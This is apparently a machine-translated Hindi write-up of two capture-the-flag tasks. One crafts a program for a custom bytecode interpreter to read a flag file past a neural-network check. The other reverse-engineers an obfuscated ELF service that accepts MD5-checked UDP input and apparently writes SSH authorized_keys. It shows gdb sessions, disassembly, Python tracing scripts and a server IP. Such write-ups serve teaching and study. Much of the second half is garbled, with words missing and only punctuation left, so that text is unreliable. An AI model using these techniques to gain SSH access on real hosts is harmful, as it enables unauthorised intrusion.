हमें पता नहीं है कि वास्तव में तंत्रिका नेटवर्क क्या पहचानता है, इसलिए हम इसे विभिन्न डेटा खिलाने की कोशिश करेंगे। नेटवर्क की वास्तुकला से यह स्पष्ट है कि इनपुट पर इसे 100X100 आकार की एकल-चैनल छवि प्राप्त होती है। परिणाम पर स्केलिंग के प्रभाव से बचने के लिए, हम सेवा में उपयोग किए गए कार्यों का उपयोग करके एक छवि में परिवर्तित 10,000 बाइट्स के दृश्यों का उपयोग करेंगे। नीचे विभिन्न डेटा पर एक तंत्रिका नेटवर्क के संचालन के परिणाम हैं:

परिणामों के आधार पर, यह माना जा सकता है कि तंत्रिका नेटवर्क को काले रंगों (शून्य बाइट्स) की प्रबलता के साथ चित्र प्राप्त होंगे। सबसे अधिक संभावना है, एक ऐसा कार्यक्रम लिखना जो झंडा पात्रों को पढ़ता है उसे 1000 से अधिक महत्वपूर्ण बाइट्स की आवश्यकता होगी (बाकी को शून्य से भरा जा सकता है), और फिर एआई भेजे गए कार्यक्रम को स्वीकार करेगा।

तदनुसार, कार्य को हल करने के लिए, यह वांछित कार्यक्रम लिखने के लिए रहता है।

SibVM दुभाषिया

कार्यक्रम की संरचना
पहला कदम प्रोग्राम फ़ाइल की संरचना को समझना है। दुभाषिया के रिवर्स के दौरान, यह पता चला कि कार्यक्रम को कुछ सेवा क्षेत्रों के साथ एक निश्चित हेडर के साथ शुरू होना चाहिए, जिसके बाद पहचानकर्ताओं के साथ संस्थाओं का एक सेट होता है, जिसके बीच टाइप फंक्शन की एक मुख्य इकाई होनी चाहिए।

फ़ाइल हैडर की जाँच करें

पुनः प्राप्त रिकॉर्ड

रिकॉर्ड को संसाधित करना और मुख्य फ़ंक्शन लॉन्च करना

परिणाम निम्न इनपुट फ़ाइल प्रारूप है:

डेटा प्रकार

दुभाषिया विभिन्न प्रकार की संस्थाओं का समर्थन करता है। नीचे एक तालिका और उनके पहचानकर्ता हैं, जिन्हें भविष्य में कार्यक्रम बनाने की आवश्यकता होगी।

दुभाषिया के लिए एक कार्यक्रम का निर्माण

जैसा कि ऊपर बताया गया है, प्रोग्राम में फंक्शन (5) के साथ एक मुख्य प्रविष्टि होनी चाहिए। इसका निम्न प्रारूप है:

मुख्य कार्यक्रम निष्पादन चक्र का पता लगाना मुश्किल नहीं था।

मुख्य निष्पादन चक्र

decode_opcode फ़ंक्शन प्रोग्राम कोड से अगले ऑपरेशन के बारे में जानकारी प्राप्त करता है। प्रत्येक ऑपरेशन के पहले दो बाइट्स में ऑपरेशन कोड, तर्कों की संख्या और उनके प्रकार होते हैं। अगले कुछ बाइट्स (प्रकार और तर्कों के आधार पर) को ऑपरेशन के तर्क के रूप में व्याख्या किया जाएगा।

ऑपरेशन के पहले दो बाइट्स का प्रारूप:

अगला, हम कुछ निर्देशों की समीक्षा करेंगे जो हमें सिस्टम से ध्वज निकालने में मदद करेंगे।

कमांड दुभाषिया ग्राफ, execute_opcode फ़ंक्शन

ओपकोड 0 - फ़ाइल को खोलता है (फ़ाइल नाम ऑपरेशन तर्क द्वारा निर्दिष्ट किया गया है और टाइप स्ट्रिंग का है) और स्टैक के शीर्ष पर इसकी सामग्री को प्रकार ByteArray ऑब्जेक्ट के रूप में ByteArray ।
ओपकोड 2 - स्टैक के शीर्ष पर संग्रहीत मूल्य प्रदर्शित करता है। दुर्भाग्य से, यह ऑपरेशन किसी प्रकार की वस्तु के मूल्य को प्रदर्शित नहीं करेगा। इस समस्या को हल करने के लिए, आप सरणी का i-th तत्व प्राप्त कर सकते हैं और इसे प्रदर्शित कर सकते हैं।

प्रसंस्करण opcode 2

ओपकोड 13 - सूचकांक द्वारा एक सरणी से एक तत्व लेना। सरणी और तत्व इंडेक्स को स्टैक से पॉप किया जाता है, परिणाम स्टैक पर धकेल दिया जाता है। तदनुसार, एक कार्य कार्यक्रम संकलित करने के लिए, सूचकांक को स्टैक पर रखना आवश्यक है।
ओपकोड 7 - स्टैक पर ऑपरेशन तर्क को धक्का देता है।

नतीजतन, कार्यक्रम में केवल 4 ऑपरेशन शामिल हैं:

अंतिम कार्यक्रम

Searched line: झंडा {76f98c7f11582d73303a4122fd04e48cba5495}

Day7। Hiddenresource

यह कार्य RuCTF द्वारा तैयार किया गया था।

N24.elf सेवा को देखते हुए। बस 95.216.185.52 पर अधिकृत करें और आपको ध्वज प्राप्त करें।

संकेत
10/28/2018 20:00
टास्क हल नहीं किया गया था। 24 घंटे जोड़े गए।

मानक कनेक्शन प्रोटोकॉल का उपयोग करके एक्सेस के लिए सर्वर का सर्वेक्षण एसएसएच (पोर्ट 22) के माध्यम से पहुंच दिखाया। उपलब्ध कराई गई फ़ाइल लिनक्स के लिए एक एलएलएफ निष्पादन योग्य है (जो कि नाम में विस्तार से संकेत दिया गया था)।

 #file UwRJ8iaEEd4tSQIe_n24.elf UwRJ8iaEEd4tSQIe_n24.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, stripped

स्ट्रिंग्स यूटिलिटी का उपयोग करते हुए "/home/task/.ssh" और "/home/task/.ssh/authorized_keys" लाइनों की उपस्थिति दिखाई दी। ईएलएफ निष्पादन योग्य फ़ाइल (बाद में सेवा के रूप में संदर्भित) से एसएसएच पासवर्ड रहित प्राधिकरण कुंजी फ़ाइल तक पहुंच की संभावना के बारे में निष्कर्ष।

प्रतीक तालिका में फ़ाइलें खोलने और लिखने के लिए आवश्यक कार्य शामिल हैं:

 # readelf --dyn-syms UwRJ8iaEEd4tSQIe_n24.elf | grep fopen 23: 0000000000000000 0 FUNC GLOBAL DEFAULT UND fopen@GLIBC_2.2.5 (2) # readelf --dyn-syms UwRJ8iaEEd4tSQIe_n24.elf | grep write 32: 0000000000000000 0 FUNC GLOBAL DEFAULT UND fwrite@GLIBC_2.2.5 (2)

प्रतीक तालिका में सॉकेट्स के साथ काम करने, प्रक्रियाएं बनाने और एमडी 5 की गिनती के लिए कार्य शामिल हैं।

फ़ाइल के रिवर्स में बड़ी संख्या में जंप (किसी प्रकार का आक्षेप) की उपस्थिति दिखाई दी। इसी समय, कोड के ब्लॉक के बीच छलांग लगाई जाती है, जिसे सामान्य तौर पर कई प्रकारों में विभाजित किया जा सकता है:

« OF », ( objdump):

  95b69b: 48 0f 44 c7 cmove rax,rdi 95b69f: 48 83 e7 01 and rdi,0x1 95b6a3: 4d 31 dc xor r12,r11 95b6a6: 71 05 jno 95b6ad <MD5_Final@@Base+0x2d83f9> 95b6a8: e9 f4 bf e1 ff jmp 7776a1 <MD5_Final@@Base+0xf43ed> 95b6ad: e9 1f 1a de ff jmp 73d0d1 <MD5_Final@@Base+0xb9e1d>

, OF «xor», «and» .

, . . , :

 95b401: c7 04 25 2b b4 95 00 mov DWORD PTR ds:0x95b42b,0x34be74 95b408: 74 be 34 00 95b40c: 66 c7 04 25 01 b4 95 mov WORD PTR ds:0x95b401,0x13eb 95b413: 00 eb 13 95b416: 4c 0f 44 da cmove r11,rdx 95b41a: 48 d1 ea shr rdx,1 95b41d: 48 0f 44 ca cmove rcx,rdx 95b421: 49 89 d3 mov r11,rdx 95b424: 48 89 ca mov rdx,rcx 95b427: 4c 89 da mov rdx,r11 95b42a: e9 8d ad e7 00 jmp 17d61bc

MD5. , . « MD5_Init », « MD5_Update » « MD5_final ».

, API . , , , , . .

ELF . «/home/task/.ssh/» .

. , , , . . Netstat 5432 (UDP).

 # netstat -ulnp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 0.0.0.0:5432 0.0.0.0:* 13611/./UwRJ8iaEEd4

(4 ) :

 #echo "test" > /dev/udp/127.0.0.1/5432 # Verifying 74657374 009ec3b8

.
– gdb. , , recvfrom backtrace. 0x6ae010.

 6ae00b: e8 d0 2b d5 ff call 400be0 <recvfrom@plt> 6ae010: e9 64 bc ea ff jmp 559c79 <MD5_Update@@Base+0x953fc> 559c79: 89 45 80 mov DWORD PTR [rbp-0x80],eax 559c7c: 83 f8 ff cmp eax,0xffffffff #   ,  -1 559c7f: 0f 84 62 7f 1c 00 je 721be7 <MD5_Final@@Base+0x9e933> 559c85: e9 8a d6 2c 00 jmp 827314 <MD5_Final@@Base+0x1a4060> 827314: 48 c7 c7 30 d1 f0 00 mov rdi,0xf0d130 82731b: 48 29 27 sub QWORD PTR [rdi],rsp 82731e: 48 89 df mov rdi,rbx 827321: e8 5f 94 fe ff call 810785 <MD5_Final@@Base+0x18d4d1> 827326: e9 d7 a5 2d 00 jmp b01902 <MD5_Init@@Base+0x7569> b01902: 85 c0 test eax,eax b01904: 0f 84 dd 02 c2 ff je 721be7 <MD5_Final@@Base+0x9e933> b0190a: e9 7c a9 bb ff jmp 6bc28b <MD5_Final@@Base+0x38fd7>

0x810758 .
break 0xb01902, .

( rax)

(gdb) b *0xb01902
Breakpoint 2 at 0xb01902
(gdb) c
Continuing.
Verifying 74657374
00f82488

Breakpoint 2, 0x0000000000b01902 in MD5_Init ()
(gdb) info reg rax
rax 0x0 0

0 . , , 0.

gdb, MD5_Update ( «test»).

परिणाम

 (gdb) b MD5_Update Breakpoint 3 at 0x4c487d (2 locations) (gdb) c Continuing. Verifying 74657374 Breakpoint 3, 0x00000000004c487d in MD5_Update () (gdb) info reg rsi rsi 0x7fffffffdd90 140737488346512 (gdb) x/20bx $rsi 0x7fffffffdd90: 0x74 0x65 0x73 0x74 0x0a 0xff 0x7f 0x00 0x7fffffffdd98: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fffffffdda0: 0x00 0x00 0x00 0x00 (gdb) info reg $rdx rdx 0x200 512

परिणाम

MD5 , 512 . , , MD5 512 . 8 , 8 , . , - . 4 3 MD5- .

0x810758 0. RAX. 2 0x810758 0x827326.

, 0x810758. gdb :

 import gdb with open("flow.log", "w") as fw: while 1: s = gdb.execute("info reg rip", to_string=True) s = s[s.find("0x"):] gdb.execute("ni", to_string=True) address = s.split("\t")[0].strip() fw.write(address + "\r\n") address = int(address, 16) if address == 0x827326: break

flow.log . , , .
« disasm.log » objdmp « : » .

 F_NAME = "disasm.log" F_FLOW = "flow.log" def prepare_code_flow(f_path): with open(f_path, "rb") as fr: data = fr.readlines() data = filter(lambda x: x, data) start_address = long(data[0].split(":")[0], 16) end_address = long(data[-1].split(":")[0], 16) res = [""] * (end_address - start_address + 1) for _d in data: _d = _d.split(":") res[long(_d[0].strip(), 16) - start_address] = "".join(_d[1:]).strip() return start_address, res def parse_instruction(code): mnem = code[:7].strip() ops = code[7:].split(",") return [mnem] + ops def process_instruction(code): parse_data = parse_instruction(code) if parse_data[1] in ["rax", "eax", "al"]: return True return False if __name__ == '__main__': # Prepare disassemble data start_address, codes = prepare_code_flow(F_NAME) with open(F_FLOW, "rb") as fr: lines = fr.readlines() lines.reverse() lines = filter(lambda x: x, lines) count = 0 for _l in lines: offset = long(_l.strip(), 16) - start_address if process_instruction(codes[offset]): print str(count) + " " + hex(offset + start_address) + " " + codes[offset] break count += 1 continue

«» , RAX. परिणाम:
0x67c27c mov DWORD PTR [rbp-0x14], 0x0
. - ( « flow.log »):

 95b6ad: jmp 73d0d1 <MD5_Final@@Base+0xb9e1d> 95b6b2: cmp DWORD PTR [rbp-0x2d4],0x133337 95b6bc: jne 67c270 <MD5_Update@@Base+0x1b79f3>

0x95b6b2 – 0x133337. , , [rbp-0x2d4]. «testtest»:

 # echo -n "testtest" > md5.bin # truncate -s 512 md5.bin # md5sum md5.bin e9b9de230bdc85f3e929b0d2495d0323 md5.bin # echo -n "testtest" > /dev/udp/127.0.0.1/5432 (gdb) b *0x95b6b2 Breakpoint 6 at 0x95b6b2 (gdb) c Continuing. Verifying 74657374 00deb9e9 Breakpoint 6, 0x000000000095b6b2 in MD5_Final () (gdb) x/20bx $rbp-0x2d4 0x7fffffffdd7c: 0xe9 0xb9 0xde 0x00 0xe9 0xb9 0xde 0x23 0x7fffffffdd84: 0x0b 0xdc 0x85 0xf3 0xe9 0x29 0xb0 0xd2 0x7fffffffdd8c: 0x49 0x5d 0x03 0x23

3 MD5-. MD5- 3 «\x37\x33\x13».

MD5 . . :

 New salt 508bd11b Next port 14235 Binding 14235 Waiting for data...3 14235 0

Netstat , . ps (). , .

5432, 14235. . . , , MD5 . , . MD5, 14235. , MD5. , .